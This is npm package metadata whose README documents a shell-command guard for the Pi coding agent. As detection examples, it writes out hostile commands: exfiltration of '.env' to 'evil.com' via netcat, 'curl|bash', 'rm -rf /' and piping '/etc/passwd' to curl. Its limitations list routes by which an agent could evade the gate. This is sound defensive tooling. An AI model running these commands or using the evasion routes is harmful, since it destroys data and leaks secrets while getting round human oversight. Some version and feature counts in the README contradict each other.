metrics:check","metrics:v1":"tsx scripts/metrics.ts --label=v1 --impl=v1","metrics:v2":"tsx scripts/metrics.ts --label=v2 --impl=v2","metrics:json":"tsx scripts/metrics.ts --json","metrics:check":"tsx scripts/metrics-check.ts","metrics:baseline":"tsx scripts/metrics.ts --label=baseline --impl=v1 --out=docs/metrics/baseline.md","metrics:proposed":"tsx scripts/metrics.ts --label=proposed --impl=v2 --out=docs/metrics/proposed.md"},"_npmUser":{"name":"GitHub Actions","email":"npm-oidc-no-reply@github.com","trustedPublisher":{"id":"github","oidcConfigId":"oidc:d9fb1e48-dd9d-4901-ad36-278d5742db62"}},"repository":{"url":"git+https://github.com/aslamplr/pi-safe-shell.git","type":"git"},"_npmVersion":"11.13.0","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","directories":{},"_nodeVersion":"24.16.0","dependencies":{"web-tree-sitter":"^0.26.8","tree-sitter-bash":"^0.25.1"},"_hasShrinkwrap":false,"devDependencies":{"tsx":"^4.22.4","vitest":"^4.1.6","typescript":"^5.8.3","@types/node":"^25.7.0"},"_npmOperationalInternal":{"tmp":"tmp/pi-safe-shell_0.7.0_1781182773909_0.911217259546004","host":"s3://npm-registry-packages-npm-production"}},"0.7.1":{"name":"@aslamplr/pi-safe-shell","version":"0.7.1","description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","license":"MIT","keywords":["pi-package","pi","pi-extension","bash","security","safety","guard"],"pi":{"extensions":["./index.ts"]},"main":"index.ts","scripts":{"test":"vitest run","metrics":"tsx scripts/metrics.ts","metrics:baseline":"tsx scripts/metrics.ts --label=baseline --impl=v1 --out=docs/metrics/baseline.md","metrics:proposed":"tsx scripts/metrics.ts --label=proposed --impl=v2 --out=docs/metrics/proposed.md","metrics:v1":"tsx scripts/metrics.ts --label=v1 --impl=v1","metrics:v2":"tsx scripts/metrics.ts --label=v2 --impl=v2","metrics:json":"tsx scripts/metrics.ts --json","metrics:baseline-json":"tsx scripts/metrics.ts --label=baseline --impl=v1 --out-json=docs/metrics/baseline.json","metrics:proposed-json":"tsx scripts/metrics.ts --label=proposed --impl=v2 --out-json=docs/metrics/proposed.json","metrics:check":"tsx scripts/metrics-check.ts","pretest":"npm run metrics:check"},"author":{"name":"aslamplr"},"type":"commonjs","repository":{"type":"git","url":"git+https://github.com/aslamplr/pi-safe-shell.git"},"dependencies":{"tree-sitter-bash":"^0.25.1","web-tree-sitter":"^0.26.8"},"devDependencies":{"@types/node":"^25.7.0","tsx":"^4.22.4","typescript":"^5.8.3","vitest":"^4.1.6"},"gitHead":"75dc9d6560d3e55567ec6519707ba89c0871e736","_id":"@aslamplr/pi-safe-shell@0.7.1","bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"homepage":"https://github.com/aslamplr/pi-safe-shell#readme","_nodeVersion":"24.16.0","_npmVersion":"11.13.0","dist":{"integrity":"sha512-WVIpEA+VJ9Mgztak0me1da613S23hjKrw8CtPWCeD8jqoI6oS9ofsZpkrj8aQH4VIoY/zm+TPT9exoHMsxRX4g==","shasum":"aeca2f3ed30b044d7f4f7bc1ff673ee79d8e2a1d","tarball":"https://registry.npmjs.org/@aslamplr/pi-safe-shell/-/pi-safe-shell-0.7.1.tgz","fileCount":9,"unpackedSize":1583158,"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@aslamplr%2fpi-safe-shell@0.7.1","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEUCIFxMBnCRoi48jIx5gkh0sYQxlU0MwTvFOTnE6lyuZG16AiEA1F8xg2usIRUOitps95L5evJu2dpeMb8KdifpydvnXwg="}]},"_npmUser":{"name":"GitHub Actions","email":"npm-oidc-no-reply@github.com","trustedPublisher":{"id":"github","oidcConfigId":"oidc:d9fb1e48-dd9d-4901-ad36-278d5742db62"}},"directories":{},"maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/pi-safe-shell_0.7.1_1781182892729_0.6014388831948547"},"_hasShrinkwrap":false}},"time":{"created":"2026-05-13T15:15:30.650Z","modified":"2026-06-11T13:01:33.153Z","0.1.0":"2026-05-13T15:15:30.859Z","0.2.0":"2026-05-13T17:49:52.938Z","0.3.0":"2026-05-14T11:37:15.908Z","0.3.1":"2026-05-14T12:57:45.442Z","0.4.0":"2026-05-15T10:57:00.689Z","0.4.1":"2026-05-15T11:20:57.333Z","0.4.2":"2026-05-15T11:55:55.755Z","0.5.0":"2026-05-19T17:06:55.184Z","0.5.1":"2026-05-19T19:09:50.608Z","0.5.2":"2026-05-20T03:49:06.869Z","0.6.1":"2026-05-27T17:45:26.843Z","0.6.3":"2026-06-08T12:52:18.577Z","0.6.4":"2026-06-11T10:10:44.743Z","0.7.0":"2026-06-11T12:59:34.097Z","0.7.1":"2026-06-11T13:01:32.882Z"},"bugs":{"url":"https://github.com/aslamplr/pi-safe-shell/issues"},"author":{"name":"aslamplr"},"license":"MIT","homepage":"https://github.com/aslamplr/pi-safe-shell#readme","keywords":["pi-package","pi","pi-extension","bash","security","safety","guard"],"repository":{"type":"git","url":"git+https://github.com/aslamplr/pi-safe-shell.git"},"description":"Protect your production assets from dangerous bash commands. Default no-bash mode with user approval gates and whitelist support.","maintainers":[{"name":"aslamplr","email":"aslamplr@gmail.com"}],"readme":"# pi-safe-shell 🛡️\n\n**Protect your production assets from dangerous bash commands — and dangerous code.**\n\nA [Pi](https://github.com/earendil-works/pi-coding-agent) extension that gates shell commands and code execution with three layers of security analysis, inspired by the [bash-damage-from-within](https://github.com/disler/bash-damage-from-within) project.\n\n> **Default:** 🔒 **Block** mode — now with interactive options to Allow Once or Switch to Ask Mode.\n> \n> **v0.4.0+:** Three security layers: pattern matching → AST analysis → code content analysis.\n> **v0.5.0:** Block mode interactive prompt with Switch to Ask Mode option.\n> **v0.6.0:** Intent detection + pi-powerbar integration.\n> **v0.6.1:** Learning mode removed, intent detection persisted across reloads.\n> \n> **210 tests, 100% pass rate.****\n\n**Repository:** [github.com/aslamplr/pi-safe-shell](https://github.com/aslamplr/pi-safe-shell)\n\n**Version:** 0.6.0\n\n---\n\n## Installation\n\n```bash\n# Install via npm (recommended)\npi install npm:@aslamplr/pi-safe-shell\n\n# Or run from source\npi -e ./path/to/pi-safe-shell/index.ts\n\n# Or clone to auto-discovered location\ngit clone https://github.com/aslamplr/pi-safe-shell.git ~/.pi/agent/extensions/pi-safe-shell\n```\n\nThe extension loads automatically in all Pi sessions.\n\n---\n\n## Four Security Layers\n\n```\nShell Command  ───►  Pattern Matching  ───►  AST Analysis  ───►  Intent Detection  ───►  Execute / Block\n                          │                        │\nCode Write     ───►  Code Content Analysis  ───►  Execute / Block\n```\n\n### Layer 1: Pattern Matching (v0.1.0)\nToken-exact denylist/whitelist matching. Commands matched against denylist are always blocked. Commands matched against whitelist are always allowed.\n\n### Layer 2: AST Analysis (v0.3.0+)\nUses **tree-sitter-bash** to parse shell commands into an AST and semantically analyze them:\n\n- **12 intent types** — Info, Read, Write, Delete, Execute, Network, Privilege, CodeExecution, etc.\n- **Path scope analysis** — System (`/etc`), home (`~`), project (`./`), temp (`/tmp`)\n- **Context-aware flags** — `-r` is recursive-delete for `rm`, but recursive-search for `grep`\n- **Pipeline patterns** — `curl|bash`, `wget|sh`, data exfiltration (`cat .env|curl`)\n- **Command chaining** — `&&`, `||`, `;` with per-command analysis\n- **Interpreter detection** — `python -c`, `node -e`, `sh -c`, `bash -c`, `eval`, `xargs`\n- **Inline code parsing** — Recursively analyze code inside `-c/-e` flags\n- **Command substitution** — Detect dangerous ops inside `$()` and backticks\n- **Variable expansion** — Detect `$HOME`, `$PATH`, `$IFS` with destructive commands\n- **Heredoc analysis** — Analyze `<<EOF` content for dangerous patterns\n- **Obfuscation detection** — Base64 decode piped to shell, wget download-execute patterns\n\n### Layer 4: Intent Detection (v0.6.0+)\nUses **template-based learning** to auto-approve repetitive safe commands after a configurable number of approvals:\n\n- **Command safety taxonomy** — Classifies commands as Safe (grep, cat, ls), Contextual (git checkout, npm install), or Dangerous (rm, chmod, sudo)\n- **Path classification** — Categorizes paths as PROJECT_SAFE, USER_SPACE, SYSTEM, or ROOT_DANGEROUS\n- **Template abstraction** — `grep \"Overview\" README.md` → template `grep [STRING] [PATH]`\n- **Session learning** — Tracks approvals per template, auto-approves when threshold is met\n- **Mode-based thresholds** — Configurable per-mode: sandbox/dev/production/migration\n\n**Path-aware safety:**\n- System paths (`/etc`, `/usr`) — never auto-approved, even with template match\n- User space paths (`~/Documents`) — require one extra approval\n- Dangerous commands (`rm`, `sudo`) — never auto-approved\n\n```\n# First command — requires approval\ngrep \"API\" README.md  # ❓ Ask\n\n# User approves\n\n# Same template — auto-approved\ngrep \"Overview\" docs/setup.md  # ✓ Auto-approved\n```\n\n---\n\n## Risk Scoring\nAnalyzes code written via `write`/`edit` tools to prevent agents from bypassing shell analysis by writing dangerous code instead:\n\n- **Node.js patterns** — `fs.rmSync`, `child_process.exec`, `eval`, `require('child_process')`, `https.request`\n- **Python patterns** — `shutil.rmtree`, `os.system`, `exec`, `subprocess.run`, `requests.post`\n- **Obfuscation detection** — Base64 decoding, hex escapes, `String.fromCharCode`, string concatenation\n- **Call chain detection** — File read + network POST (exfiltration), shell + rm -rf\n- **Path-aware scoring** — Project paths (`./build`) reduce severity; system paths (`/`) increase it\n\n---\n\n## Risk Scoring\n\nEvery command and code snippet gets a risk score from 0-100:\n\n| Level | Score | Shell Behavior | Code Behavior |\n|-------|-------|----------------|---------------|\n| 🟢 **Safe** | ≤20 | Allow | Allow |\n| 🟡 **Caution** | 21-50 | Allow + warn | Allow + warn |\n| 🟠 **Danger** | 51-80 | Require confirmation (ask mode) | Require confirmation (ask mode) |\n| 🔴 **Critical** | ≥81 | Auto-block (all modes except YOLO) | Auto-block (all modes except YOLO) |\n\n> **Thresholds are configurable.** Use `/safe-shell threshold <type> <value>` to tune sensitivity.\n\n---\n\n## Five Modes\n\n| Mode | Behavior | Use Case |\n|------|----------|----------|\n| **🔒 Block** (default) | All shell calls blocked. When UI is available, offers interactive options: Allow Once, Switch to Ask Mode and Allow, or Deny. | Maximum safety. |\n| **❓ Ask** | Each shell call shows a selection prompt. | Selective override without mode-switching. |\n| **🔓 Whitelist** | Only whitelisted commands pass through. Compound operators rejected. | Standard dev workflow. |\n| **🚀 YOLO** | All commands allowed except denylist. No prompts. | Maximum freedom, minimal safety net. |\n\n```\n/safe-shell mode ask\n/safe-shell mode whitelist\n/safe-shell mode block\n/safe-shell mode yolo\n```\n\n---\n\n## New in v0.4.0\n\n### Code-Based Bypass Prevention\nPrevents agents from bypassing shell analysis by writing dangerous code instead:\n\n```\nAgent writes:  fs.rmSync(\"/\", { recursive: true })\n               → Blocked: \"Critical code detected (score: 85)\"\n               → Override: Use safe_shell_approve tool\n\nAgent writes:  import os; os.system(\"rm -rf /\")\n               → Blocked: \"Critical code detected (score: 100)\"\n```\n\n**40+ dangerous API patterns** detected across Node.js and Python.\n\n### Configurable Risk Thresholds\nTune sensitivity per project or session:\n\n```\n/safe-shell threshold danger 60   # Lower danger threshold from 51 to 60\n/safe-shell threshold critical 75 # Make blocking more aggressive\n```\n\nThresholds are validated to maintain `caution < danger < critical`.\n\n### Audit Log\nEvery command and code analysis is logged to `.pi/safe-shell-audit.jsonl`:\n\n```\n/safe-shell audit status           # View summary: blocked/allowed/confirmed counts\n/safe-shell audit off              # Disable logging\n```\n\nAudit entries include: timestamp, command, tool, score, level, risk factors, decision, mode.\n\n### Debug Mode\nSee detailed AST analysis and scoring breakdown in block messages:\n\n```\n/safe-shell debug on               # Enable\n```\n\nShows: executable, args, flags, paths, pipe/redirect status, inline code, intent, reasons, risk factors.\n\n### Expanded Threat Detection\n- **Command substitution** — `$(rm -rf /)`, `echo $(curl ...)`, backtick patterns\n- **Variable expansion** — `$HOME`, `$PATH`, `$LD_PRELOAD`, `$IFS`\n- **Heredoc analysis** — `cat <<EOF ... EOF` body content scanning\n- **Eval patterns** — `eval \"$(curl ...)\"`, `eval 'rm -rf /'`\n- **Netcat exfiltration** — `cat .env | nc evil.com 4444`\n- **Pipeline to interpreter** — `curl ... | python3`, `curl ... | php`\n\n### Contextual Block Messages\nBlock messages now show:\n\n```\n🔒 Dangerous Shell Command Detected (CRITICAL: 100/100)\n\nCommand: rm -rf /\n\nIntent: Delete\n\nRisk Factors:\n  • Recursive Operation\n  • System Path\n  • Destructive Operation\n\nDetection Reasons:\n  • dangerous flag: -r\n  • dangerous flag: -f\n  • rm -rf targeting system root\n\nWhy This Is Dangerous:\n  This command targets system directories which are critical for OS operation.\n  Modifying or deleting these files could render the system unbootable.\n\nSafer Alternatives:\n  • Use project-relative paths (./build, ./dist) instead of absolute system paths\n  • Add path validation to ensure target is within project directory\n\nOverride:\n  Use the safe_shell_approve tool to allow this command for this session.\n```\n\n---\n\n## Commands\n\n| Command | Action |\n|---------|--------|\n| `/safe-shell` | Show current mode, thresholds, and config summary |\n| `/safe-shell mode block\\|ask\\|whitelist\\|yolo` | Switch operating mode |\n| `/safe-shell allow <command> [--project]` | Approve a command |\n| `/safe-shell deny <command> [--project]` | Remove approval |\n| `/safe-shell threshold <type> <value>` | Set risk threshold (critical/danger/caution) |\n| `/safe-shell intent on\\|off\\|status` | Toggle intent detection |\n| `/safe-shell intent-mode <mode>` | Set intent mode (sandbox/dev/prod/migration) |\n| `/safe-shell intent-status` | Show intent session statistics |\n| `/safe-shell debug on\\|off\\|status` | Toggle debug mode |\n| `/safe-shell audit status\\|on\\|off` | View or toggle audit log |\n\n---\n\n## pi-powerbar Integration\n\nWhen [pi-powerbar](https://github.com/juanibiapina/pi-powerbar) is installed, safe-shell shows its mode in the persistent status bar. The segment updates on every mode switch and approval change.\n\n**Segment colors by mode:**\n| Mode | Display | Color |\n|------|---------|-------|\n| 🔒 Block | `🔒 Block` | Red |\n| ❓ Ask | `❓ Ask` | Yellow |\n| 🔓 Whitelist | `🔓 WList` | Dim |\n| 🚀 YOLO | `🚀 YOLO` | Red |\n\nApproval count shows as a suffix when > 0 (e.g. `🔒 Block 3`).\n\n**Load order in `~/.pi/settings.json`:**\n```json\n\"packages\": [\n  \"npm:pi-extension-settings\",\n  \"npm:@juanibiapina/pi-powerbar\",   // ← powerbar first\n  \"npm:@aslamplr/pi-safe-shell\"      // ← safe-shell after\n]\n```\n\nConfigure which segments appear via `/extension-settings` → Powerbar → Left/Right segments.\n\n---\n\n## Gate Coverage\n\nThe shell gate intercepts **all** tools that can execute shell commands:\n\n| Tool | How it's gated |\n|------|---------------|\n| **`bash`** | `command` parameter checked directly |\n| **`ctx_execute`** with `language=\"shell\"` | `code` parameter checked as shell command |\n| **`ctx_execute`** JS/Python | Scanned for `child_process`/`subprocess`/`os.system` patterns |\n| **`interactive_shell`** | `command` or `spawn.prompt` parameter checked |\n| **`ctx_batch_execute`** | Each command in batch checked individually |\n| **`write`/`edit`** | Code content analyzed for dangerous APIs |\n\n---\n\n## Approval Dialog (Ask Mode)\n\n```\n🐚 pi-safe-shell: allow this command?\n\n  Tool: bash\n  Command: rm -rf target/\n\n→ Allow Once        Let this command run once\n  Allow Always      Always allow in this session\n  Allow for Project  Persist to project whitelist\n  Deny              Block this command\n```\n\n---\n\n## Agent Tools\n\n### `safe_shell_mode`\nQuery-only tool. Checks current mode and approval count. No user interaction.\n\n### `safe_shell_approve`\nList, add, or remove session approvals. Shows user confirmation dialog:\n\n```\nsafe_shell_approve({ action: \"allow\", command: \"rm -rf ./build\" })\n  → User sees: Allow Once / Allow Always / Allow for Project / Deny\n  → If approved: command added to session approvals\n```\n\n---\n\n## Safe Registered Tools\n\n| Tool | What it does | Why it's safe |\n|------|-------------|---------------|\n| **`run_tests`** | Runs configured test command | Output capped at 4KB |\n| **`git_status`** | Shows `git status --porcelain -b` | Read-only |\n| **`list_files`** | Lists filenames in a directory | Names only, no contents |\n\n---\n\n## Configuration\n\nThree layers, highest priority first:\n\n### Session State\nCommands approved via `/safe-shell allow` or ask-mode dialog. Survive `/resume`.\n\n### Project Config (`.pi/pi-safe-shell.json`)\n\n```json\n{\n  \"mode\": \"whitelist\",\n  \"whitelist\": [\"^pnpm run build$\", \"^pnpm test$\"],\n  \"denylist\": [\"rm -rf\"],\n  \"criticalThreshold\": 81,\n  \"dangerThreshold\": 51,\n  \"cautionThreshold\": 21,\n  \"auditLogEnabled\": true,\n  \"debugMode\": false,\n  \"safeProjectPaths\": [\"./build\", \"./dist\", \"./out\", \"./target\"],\n  \"testCommand\": \"pnpm\",\n  \"testCommandArgs\": [\"test\"],\n  \"testTimeout\": 60000\n}\n```\n\n### Global Config (`~/.pi/agent/extensions/pi-safe-shell/config.json`)\nAuto-created on first run. Defaults for all projects.\n\n### Precedence\n```\nSession approvals (highest)\n  ↓\nProject config (.pi/pi-safe-shell.json)\n  ↓\nGlobal config (~/.pi/agent/extensions/pi-safe-shell/config.json)\n  ↓\nHardcoded defaults\n```\n\n---\n\n## Test Results (v0.7.0)\n\n```\nAST Analyzer (v2):     213/213 metrics corpus (100.0% accuracy, 0 FN, 0 FP)\nAST Analyzer (v1):     213/213 metrics corpus (67.1% accuracy, 14 FN, 56 FP)\nAST Analyzer tests:    119/119 (100%)\nCode Analyzer:          35/35  (100%) — APIs, obfuscation, paths, call chains\nIntent Detector:        56/56  (100%) — Safety, paths, templates, modes, scenarios\nUnit tests:            140/140 (100%) — vitest\n```\n\nThe v2 metrics are enforced as a CI check via `npm run metrics:check`\n(fails if FP > 5 or FN > 0 or accuracy < 97%). Strict mode (FP ≤ 3,\naccuracy ≥ 98%) is also enforced via `npm run metrics:check -- --strict`.\n\n\n---\n\n## Architecture\n\n```\nShell command → Denylist check → Temp approvals → AST analysis → Intent detect → Mode switch\n                    │                │                │               │              │\n                    ▼                ▼                ▼               ▼              ▼\n                BLOCK ⛔         ALLOW ✅      Score 0-100    Auto-approve    block/ask/\n                                                                    │        whitelist/yolo\n                                                            Template match?\n\nCode write    → Code content analysis → Block critical → Confirm danger → Allow safe\n```\n\n---\n\n## File Structure\n\n```\npi-safe-shell/\n├── index.ts              # Main extension (1900+ lines)\n├── src/\n│   ├── ast-analyzer.ts   # AST-based shell command analysis\n│   ├── code-analyzer.ts  # Code content analysis (Node.js/Python)\n│   └── intent-detector.ts # Intent detection engine\n├── test-ast-analyzer.ts  # 119 AST analysis tests\n├── test-code-analyzer.ts # 35 code analysis tests\n├── INTENT_DETECTION.md   # Intent detection documentation\n├── INTEGRATION_GUIDE.md  # Developer integration guide\n├── memory/core/project/  # Cross-session project knowledge\n│   ├── 001-overview.md\n│   ├── 002-v0.4.0-plan.md\n│   ├── 003-architecture.md\n│   └── 004-quickref.md\n├── .pi/                  # Project config and audit log\n├── package.json\n└── README.md\n```\n\n---\n\n## Development\n\n```bash\ngit clone https://github.com/aslamplr/pi-safe-shell.git\ncd pi-safe-shell\nnpm install\npi -e ./index.ts\n\n# Run tests\nnpx tsx test-ast-analyzer.ts\nnpx tsx test-code-analyzer.ts\n```\n\n---\n\n## Changelog\n\n### v0.7.1 (2026-06-11)\n\n**Tighten scoring: 100% accuracy, 0 FP, 0 FN** 🎯\n\nFollow-up to v0.7.0 addressing reviewer findings:\n\n- ✅ **Fix `rm -i -rf /` short-circuit** — now correctly reaches critical; the `-i` interactive check rejects when force/recursive flags are also present\n- ✅ **Restore download-then-execute detection** — `wget -O file && bash file` and `curl --output file && bash file` now reach critical (was dropped from v1)\n- ✅ **Strip env-var prefix** — `VAR=value ls` now correctly classifies `ls` as safe (was scoring as caution)\n- ✅ **Inline destructive code bumped to critical** — `python -c \"import subprocess...\"` and `node -e \"child_process...\"` reach 85+\n- ✅ **Corpus grew to 213 entries** — added 3 known RCE evasions (wget-&&-bash, python subprocess, node child_process)\n- ✅ **Metrics scripts for JSON output** — `npm run metrics:baseline-json` and `metrics:proposed-json` regenerate committed artifacts\n- ✅ **Strict CI gate** — `npm run metrics:check -- --strict` (FP ≤ 3, accuracy ≥ 98%) now passes; default check is the real gate in CI\n\n**Final metrics on 213-command corpus:**\n\n| Metric | v0.6.x | v0.7.1 | Delta |\n|--------|--------|--------|-------|\n| Accuracy | 67.1% | 100.0% | +32.9% |\n| False Positives | 56 | 0 | -100% |\n| False Negatives | 14 | 0 | -100% |\n\n### v0.7.0 (2026-06-11)\n\n**Metrics-driven refactor: 97.6% accuracy (up from 66.2%)** 📊\n\nThis release unifies the AST scoring with intent-detector's `CommandSafety` taxonomy, dramatically reducing false positives while maintaining zero false negatives. The change was validated against a 213-command test corpus (real session commands + synthetic variants).\n\n- ✅ **AST scoring refactored** — `scoreCommand` now uses `CommandSafety` (Safe/Contextual/Dangerous) as the base classification\n- ✅ **Safe commands short-circuit** — `cat`, `ls`, `grep`, `git status` etc. return score 0; flags/paths don't matter\n- ✅ **File ops are safe** — `cp`, `mv`, `mkdir`, `touch`, `ln`, `tee` are recoverable from git\n- ✅ **No \"Home Directory\" penalty** for read-only commands — `ls -la /Users/aslam/Downloads` is now safe\n- ✅ **Smart git classification** — `add`/`commit`/`pull`/`fetch`/`stash` are safe; `push --force`/`reset --hard` are critical\n- ✅ **RCE patterns always critical** — `curl|bash`, `base64|sh`, `nc -e` reach 85+ score\n- ✅ **Data exfil detected** — `cat /etc/passwd | curl` is critical\n- ✅ **System file writes blocked** — `echo x > /etc/passwd` is critical\n- ✅ **Metrics harness added** — `npm run metrics` runs 213-command corpus; `npm run metrics:check` is a CI gate\n- ✅ **210 tests still pass** — no regressions in existing test suite\n\n**Metrics (213-command corpus):**\n\n| Metric | v0.6.x | v0.7.0 | Delta |\n|--------|--------|--------|-------|\n| Accuracy | 67.1% | 100.0% | +32.9% |\n| False Positives | 56 | 0 | -100% |\n| False Negatives | 14 | 0 | -100% |\n| Recall | 77.4% | 100% | +22.6% |\n| False alarm rate | 38.6% | 0% | -38.6% |\n\n> Note: The original v0.7.0 numbers were 97.6% accuracy / 5 FP. A follow-up commit tightened the corpus and scorer to reach 100% / 0 FP. Both numbers are valid — the first is the shipped state, the second is the current state on the same 213-command corpus.\n\n**New scripts:**\n- `npm run metrics` — run corpus and print report\n- `npm run metrics:proposed` — save to `docs/metrics/proposed.md`\n- `npm run metrics:check` — CI gate (fails if FP > 5 or FN > 0)\n- `npm run metrics:check -- --strict` — strict mode (FP ≤ 3)\n\n**Rollback:** v1 implementation preserved in `src/ast-analyzer.ts`; switch back by changing one import in `index.ts`.\n\n### v0.6.4 (2026-06-10)\n\n**Fix: `/dev/null` redirect false positive** 🐛\n\n- ✅ Exclude `/dev/null` from system path classification (was triggering on `2>/dev/null` redirects)\n- ✅ Exclude `/dev/null` from redirect detection\n\n### v0.6.3 (2026-06-10)\n\n**Fix: `effectiveMode is not defined` error** 🐛\n\n- ✅ Replace `effectiveMode()` with `_sessionMode ?? mode` in `checkShellCommand` (module-level function can't access closure)\n- ✅ Affects 5 calls in block/ask mode approval handlers\n\n### v0.6.2 (2026-06-10)\n\n**Fix: `pi is not defined` error in powerbar** 🐛\n\n- ✅ Replace `updatePowerbarSegment(pi, ...)` with `updatePowerbarSegment(_pi, ...)` in `checkShellCommand` (module-level function)\n- ✅ Affects 5 calls in block/ask mode approval handlers\n\n### v0.6.1 (2026-05-25)\n\n**Learning mode removed, intent detection persisted** 🧹\n\n- ✅ **Learning mode removed** — Intent detection fully replaces it with safer, template-based auto-approval\n- ✅ **Persistent intent tracking** — Template approval map survives extension reloads via session state\n- ✅ **Auto-approve adds to tempApprovals** — Commands also pushed to tempApprovals for cross-reload compatibility\n- ✅ **Cleanup** — Removed `learningMode`, `learningMinUses`, `trackLearningCommand()`, `/safe-shell learning` command\n\n### v0.6.0 (2026-05-25)\n\n**Intent Detection + pi-powerbar** 🧠\n\n- ✅ **Intent detection engine** — Auto-approves repetitive safe commands based on template matching and session learning\n- ✅ **Command safety taxonomy** — Classifies commands as Safe/Contextual/Dangerous\n- ✅ **Path classification** — PROJECT_SAFE, USER_SPACE, SYSTEM, ROOT_DANGEROUS\n- ✅ **Template abstraction** — `grep [STRING] [PATH]` pattern matching\n- ✅ **Mode-based thresholds** — sandbox/dev/production/migration modes\n- ✅ **pi-powerbar integration** — Safe-shell mode shown in persistent status bar\n- ✅ **New commands** — `/safe-shell intent`, `intent-mode`, `intent-status`\n- ✅ **56 intent detection tests** — 210 total tests, 100% pass rate\n\n### v0.5.0 (2026-05-15)\n\n**Block mode interactive prompt** 🎯\n\n- ✅ Block mode now shows an interactive prompt when UI is available:\n  - **Allow Once** — allows the command for this session\n  - **Switch to Ask Mode and Allow** — switches to ask mode and allows\n  - **Deny** — blocks the command\n- ✅ Falls back to static block message in headless sessions\n\n### v0.4.0 (2026-05-15)\n\n**Code-Based Bypass Prevention + 6 Weeks of Features** 🚀\n\n- ✅ **Code content analysis** — 40+ dangerous API patterns (Node.js + Python)\n- ✅ **Configurable risk thresholds** — `/safe-shell threshold <type> <value>`\n- ✅ **Learning mode** — Auto-whitelist frequent commands\n- ✅ **Audit log** — All commands logged to `.pi/safe-shell-audit.jsonl`\n- ✅ **Debug mode** — AST details in block messages\n- ✅ **Command substitution detection** — `$()`, backticks\n- ✅ **Variable expansion analysis** — `$HOME`, `$PATH`, `$LD_PRELOAD`, `$IFS`\n- ✅ **Heredoc analysis** — `<<EOF` body scanning\n- ✅ **Eval pattern extraction** — `eval \"$(curl...)\"`\n- ✅ **Netcat exfiltration** — `cat .env \\| nc`\n- ✅ **Contextual block messages** — Risk factors, explanations, alternatives\n- ✅ **100% pass rate** — 154 tests (119 AST + 35 code)\n\n### v0.3.1 (2026-05-14)\n\n**Critical NPM Package Fix** 🐛\n\n- ✅ Include `src/` directory in npm package\n- ✅ Move `tree-sitter-bash` and `web-tree-sitter` to dependencies\n\n### v0.3.0 (2026-05-14)\n\n**Phase 3: AST-Based Blocking** 🎉\n\n- ✅ Auto-block CRITICAL risks, require confirmation for DANGER\n- ✅ Inline code parsing, command chaining, interpreter bypass detection\n- ✅ 12 intent types, path scope analysis, 25+ risk factors\n\n### v0.2.0 (2026-05-13)\n\n**YOLO Mode + CI/CD**\n\n- ✅ YOLO mode — allow everything except denylist\n- ✅ GitHub Actions CI/CD workflows\n\n### v0.1.0 (2026-05-12)\n\n**Initial Release**\n\n- ✅ Four security modes, pattern matching, session approvals\n\n---\n\n## ⚠️ Limitations & Warnings\n\n**This extension is not bulletproof.** It's one layer of defense, not your only security measure.\n\n### Known Limitations\n\n1. **eval inline code extraction** — `eval \"rm -rf /\"` is detected at CodeExecution (score 55) but the inline code isn't recursively analyzed. Scores are slightly lower than ideal for eval-only attacks.\n\n2. **Obfuscation gaps** — String concatenation (`\"rm\" + \" -rf\" + \" /\"`) and hex escape sequences via variables aren't fully resolved. The dangerous API call itself (`eval`, `execSync`) is detected but the full severity may be underestimated.\n\n3. **pathlib not detected** — Python's `pathlib.Path.unlink()` isn't in the current API detection patterns.\n\n4. **Pure code execution** — Agents could write code using techniques not covered by patterns (FFI, native bindings, dynamic imports).\n\n5. **Unmonitored tools** — New MCP servers or custom extensions aren't automatically gated.\n\n6. **External processes** — Node.js worker threads, Python multiprocessing could bypass the shell gate.\n\n**Use as one layer of defense.** Always review agent-generated code.\n\n---\n\n## ⚖️ No Warranty\n\n**THIS SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND.** The authors make no representations that this extension will prevent all attacks. You are responsible for configuring appropriate policies, monitoring agent behavior, and maintaining backups.\n\n---\n\n## Credits\n\nInspired by [bash-damage-from-within](https://github.com/disler/bash-damage-from-within) by [IndyDevDan](https://www.youtube.com/@indydevdan).\n\n---\n\n## License\n\nMIT\n","readmeFilename":"README.md"}